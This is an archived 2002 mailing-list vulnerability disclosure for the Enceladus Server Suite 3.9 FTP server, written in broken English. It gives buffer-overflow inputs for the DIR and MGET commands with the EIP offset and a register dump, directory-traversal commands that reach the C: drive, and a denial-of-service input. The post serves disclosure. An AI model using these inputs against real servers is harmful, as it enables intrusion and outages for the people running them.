hi Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server for Windows, the version 3.9 according to mollensoft "Includes a fix to the directory traversal vulnerability... ( This is a CRITICAL SECURITY UPDATE)" http://www.mollensoft.com/ I found several vulnerability critical concerning this server 1-buffer overflow and remote code execution: tamer notified that the waiter crashait with "long sequence of characters as an argument to "CD" command" (http://online.securityfocus.com/archive/1/302596)..I believe that it passed dimensioned of a true buffer overflow because this crash allows only a overwrite ' ESP and thusune simple attaque DOS 50e091e3 803820 cmp byte ptr [eax],0x20 (ftpservx.dll) with argument "DIR" we can overwrite eip dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45 sufficient for the injection of a shellcode the state of the registers is: Access violation - code c0000005 (first chance) eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0 edi=0019affd eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 61616161 ?? ??? it is noticed whereas the eip is at the beginning of our buffer ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE] aaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa the argument "mget" gives also the same result the exploit is simple of realization since ebx point towards our buffer 0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 2- directory traversal ftp>cd .. access denied ftp>cd cd @/....\ 250 CWD command successful. ftp> dir 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous- ftp drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads -rwxr-xr-x 1 User Group 8544 Mar 18 02:09 emailme.html -rwxr-xr-x 1 User Group 878 Mar 16 04:52 execupload.html -rwxr-xr-x 1 User Group 1033 Oct 27 02:22 exitstatus.html -rwxr-xr-x 1 User Group 5965 Mar 18 02:12 fileuplogin.html drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot drwxr-xr-x 1 User Group 0 Dec 18 12:59 images -rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html -rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html -rwxr-xr-x 1 User Group 1299 Mar 18 23:41 mailexitstatus.html -rwxr-xr-x 1 User Group 4402 Mar 18 02:09 MyPictures.html drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure- downloads -rwxr-xr-x 1 User Group 5082 Mar 18 02:09 signguestbook.html -rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html ftp> cd @@@@@@@@@@@/..c:\ 250 CWD command successful. ftp> dir 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Listing complete. ftp> pwd 257 "c:/" is current directory. ftp> dir [NO COMMENT] 3-denial of service and consume cpu ftp> cd @/..@/.. (no reponse) cpu 99% used securma massine _________________________________________________________ Gagne une PS2 ! Envoie un SMS avec le code PS au 61166 (0,35€ Hors coût du SMS)
This archive was generated by hypermail 2b30 : Thu Dec 19 2002 - 19:28:26 PST